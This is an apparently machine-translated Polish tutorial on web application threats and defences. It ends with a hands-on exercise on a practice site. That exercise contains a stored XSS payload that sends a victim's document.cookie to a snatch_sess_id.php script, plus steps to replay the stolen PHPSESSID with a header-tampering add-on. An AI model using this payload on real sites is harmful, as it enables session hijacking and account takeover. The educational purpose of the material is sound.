więcej osób ma dostęp do Internetu niż kiedykolwiek wcześniej. Skłoniło to wiele organizacji do opracowania aplikacji internetowych, które użytkownicy mogą używać online do interakcji z organizacją. Źle napisany kod dla aplikacji internetowych może zostać wykorzystany do uzyskania nieautoryzowanego dostępu do poufnych danych i serwerów WWW.

w tym samouczku dowiesz się, jak włamać się do stron internetowych, a my przedstawimy Ci techniki hakerskie aplikacji internetowych i środki zaradcze, które możesz wprowadzić w celu ochrony przed takimi atakami.

tematy omówione w tym tutorialu

• co to jest aplikacja internetowa? Czym są zagrożenia internetowe?
• Jak zabezpieczyć swoją stronę przed hackami?
• Website Hacking tricks: Hack strony internetowej online!

co to jest aplikacja internetowa? Czym są zagrożenia internetowe?

aplikacja internetowa (inaczej strona internetowa) to aplikacja oparta na modelu klient-serwer. Serwer zapewnia dostęp do bazy danych i logikę biznesową. Jest on hostowany na serwerze WWW. Aplikacja kliencka działa na klienckiej przeglądarce internetowej. Aplikacje internetowe są zwykle pisane w językach takich jak Java, C# i VB.Net, PHP, Coldfusion Markup Language, itp. silniki baz danych stosowane w aplikacjach internetowych to MySQL, MS SQL Server, PostgreSQL, SQLite, itp.

większość aplikacji internetowych jest hostowana na publicznych serwerach dostępnych za pośrednictwem Internetu. Dzięki temu są podatne na ataki ze względu na łatwą dostępność. Poniżej przedstawiono typowe zagrożenia aplikacji internetowych.

• SQL Injection – celem tego zagrożenia może być ominięcie algorytmów logowania, sabotaż danych itp.
• ataki typu Denial of Service– celem tego zagrożenia może być odmowa prawowitym użytkownikom dostępu do zasobu
• Cross Site Scripting XSS– celem tego zagrożenia może być wstrzyknięcie kodu, który może być wykonany po stronie klienta przeglądarki.
• zatrucie ciasteczkami / sesją – celem tego zagrożenia jest modyfikacja danych ciasteczek / sesji przez atakującego w celu uzyskania nieautoryzowanego dostępu.
• manipulowanie formularzami-celem tego zagrożenia jest modyfikacja danych formularzy, takich jak ceny w aplikacjach e-commerce, aby atakujący mógł uzyskać przedmioty po obniżonych cenach.
• Code Injection-celem tego zagrożenia jest wstrzyknięcie kodu takiego jak PHP, Python itp. które można wykonać na serwerze. Kod może instalować backdoory, ujawniać poufne informacje itp.
• Defacement-celem tego zagrożenia jest zmodyfikowanie strony wyświetlanej na stronie internetowej i przekierowanie wszystkich żądań strony na jedną stronę zawierającą wiadomość atakującego.

Jak zabezpieczyć swoją stronę przed hackami?

organizacja może przyjąć następującą zasadę, aby chronić się przed atakami na serwer WWW.

• SQL Injection– dezynfekcja i Walidacja parametrów użytkownika przed przesłaniem ich do bazy danych w celu przetworzenia może zmniejszyć ryzyko ataku za pomocą SQL Injection. Silniki baz danych takie jak MS SQL Server, MySQL itp. parametry wsparcia i przygotowane Oświadczenia. Są one znacznie bezpieczniejsze niż tradycyjne polecenia SQL
• ataki typu Denial of Service – firewalle mogą być używane do usuwania ruchu z podejrzanych adresów IP, jeśli atak jest prostym DoS. Odpowiednia konfiguracja sieci i systemu wykrywania włamań może również pomóc zmniejszyć szanse powodzenia ataku DoS.
• Cross Site Scripting – sprawdzanie poprawności i dezynfekcji nagłówków, parametrów przekazywanych przez URL, parametrów formularzy i ukrytych wartości może pomóc zmniejszyć ataki XSS.
• zatrucie ciasteczkami / sesją – można temu zapobiec poprzez zaszyfrowanie zawartości ciasteczek, wyłączenie ciasteczek po pewnym czasie, powiązanie ciasteczek z adresem IP klienta, który został użyty do ich utworzenia.
• form temperowanie – można temu zapobiec poprzez walidację i weryfikację danych wejściowych użytkownika przed ich przetworzeniem.
• wstrzyknięcie kodu – można temu zapobiec, traktując wszystkie parametry jako dane, a nie kod wykonywalny. Dezynfekcja i Walidacja mogą być wykorzystane do wdrożenia tego.
• Defacement – dobra polityka bezpieczeństwa tworzenia aplikacji internetowych powinna zapewnić uszczelnienie powszechnie używanych luk w dostępie do serwera www. Może to być właściwa konfiguracja systemu operacyjnego, oprogramowania serwera WWW i najlepszych praktyk bezpieczeństwa podczas tworzenia aplikacji internetowych.

Website Hacking tricks: Hack strony internetowej w Internecie

w tym website hacking praktyczny scenariusz, mamy zamiar porwać sesji użytkownika aplikacji internetowej znajdującej się w www.techpanda.org. Będziemy używać cross Site scripting do odczytywania identyfikatora sesji cookie, a następnie używać go do podszywania się pod legalną sesję użytkownika.

założeniem jest to, że atakujący ma dostęp do aplikacji internetowej i chciałby przejąć sesje innych użytkowników, którzy używają tej samej aplikacji. Celem tego ataku może być uzyskanie dostępu administratora do aplikacji internetowej, zakładając, że konto dostępu atakującego jest ograniczone.

wprowadzenie

• Otwórz http://www.techpanda.org/
• w celach praktycznych zdecydowanie zaleca się uzyskanie dostępu za pomocą SQL Injection. Więcej informacji na ten temat można znaleźć w tym artykule.
• the login email is Ten adres pocztowy jest chroniony przed spamowaniem. Aby go zobaczyć, konieczne jest włączenie w przeglądarce obsługi JavaScript., hasło jest Password2010
• Jeśli zalogowałeś się pomyślnie, otrzymasz następujący pulpit nawigacyjny

• kliknij Dodaj nowy kontakt
• wpisz następujące jako imię

<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape \(document.cookie\)\;\”>Dark</a>

tutaj,

powyższy kod wykorzystuje JavaScript. Dodaje hiperłącze ze zdarzeniem onclick. Gdy niczego nie podejrzewający użytkownik kliknie łącze, Zdarzenie pobiera identyfikator sesji pliku cookie PHP i wysyła go do snatch_sess_id.strona php wraz z identyfikatorem sesji w adresie URL

• wprowadź pozostałe dane, jak pokazano poniżej
• kliknij Zapisz zmiany

• Twój pulpit nawigacyjny będzie teraz wyglądał jak następujący ekran

• ponieważ kod skryptu Cross Site jest przechowywany w bazie danych, zostanie załadowany za każdym razem użytkownicy z prawami dostępu login
• Załóżmy, że administrator loguje się i kliknie hiperłącze z napisem Dark
• on/ona otrzyma okno z identyfikatorem sesji pokazującym się w adresie URL

Uwaga: skrypt może wysyłać wartość do niektórych użytkowników.zdalny serwer, na którym przechowywany jest PHPSESSID, a następnie użytkownik przekierowuje z powrotem na stronę internetową, jakby nic się nie stało.

Uwaga: wartość, którą otrzymujesz, może różnić się od tej w tym samouczku hackowania strony internetowej, ale koncepcja jest taka sama

Podszywanie się pod sesję za pomocą Firefoksa i dodatku do manipulowania danymi

poniższy schemat pokazuje kroki, które musisz wykonać, aby wykonać to ćwiczenie.

• do tej sekcji będziesz potrzebować przeglądarki Firefox i dodatku do manipulowania danymi
• Otwórz Firefoksa i zainstaluj dodatek zgodnie z poniższymi diagramami

• wyszukaj dane sabotażu, a następnie kliknij Zainstaluj, jak pokazano powyżej

• kliknij na Akceptuj i zainstaluj…

• kliknij Uruchom ponownie teraz po zakończeniu instalacji
• Włącz pasek menu w Firefoksie, jeśli nie jest wyświetlany

• kliknij menu Narzędzia, a następnie wybierz sabotaż danych, jak pokazano poniżej

• pojawi się następujące okno. Uwaga: Jeśli System Windows nie jest pusty, naciśnij przycisk Wyczyść

• kliknij menu Start Sabotaż
• Przełącz z powrotem na przeglądarkę Firefox, wpisz http://www.techpanda.org/deska rozdzielcza.php następnie naciśnij klawisz enter, aby załadować stronę
• pojawi się następujące wyskakujące okienko z danymi manipulacyjnymi

• wyskakujące okno ma trzy (3) opcje. Opcja Sabotaż pozwala zmodyfikować informacje nagłówka HTTP przed przesłaniem ich na serwer.
• kliknij na nią
• pojawi się następujące okno

• skopiuj identyfikator sesji PHP skopiowany z adresu URL ataku i wklej go po znaku równości. Twoja wartość powinna teraz wyglądać tak

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• kliknij przycisk OK
• ponownie pojawi się wyskakujące okno z danymi sabotażu

• odznacz pole wyboru, które prosi o kontynuowanie manipulacji?
• kliknij przycisk Wyślij po zakończeniu
• powinieneś być w stanie zobaczyć pulpit nawigacyjny, jak pokazano poniżej

Uwaga: nie logowaliśmy się, podszywaliśmy się pod sesję logowania za pomocą wartości PHPSESSID, którą pobraliśmy za pomocą cross Site scripting

podsumowanie

• aplikacja internetowa oparta jest na modelu Serwer-Klient. Strona klienta korzysta z przeglądarki internetowej, aby uzyskać dostęp do zasobów na serwerze.
• aplikacje internetowe są zwykle dostępne przez internet. To czyni je podatnymi na ataki.
• zagrożenia aplikacji internetowych obejmują SQL Injection, Code Injection, XSS, Defacement, zatrucie ciasteczkami itp.
• dobra polityka bezpieczeństwa podczas tworzenia aplikacji internetowych może pomóc w ich zabezpieczeniu.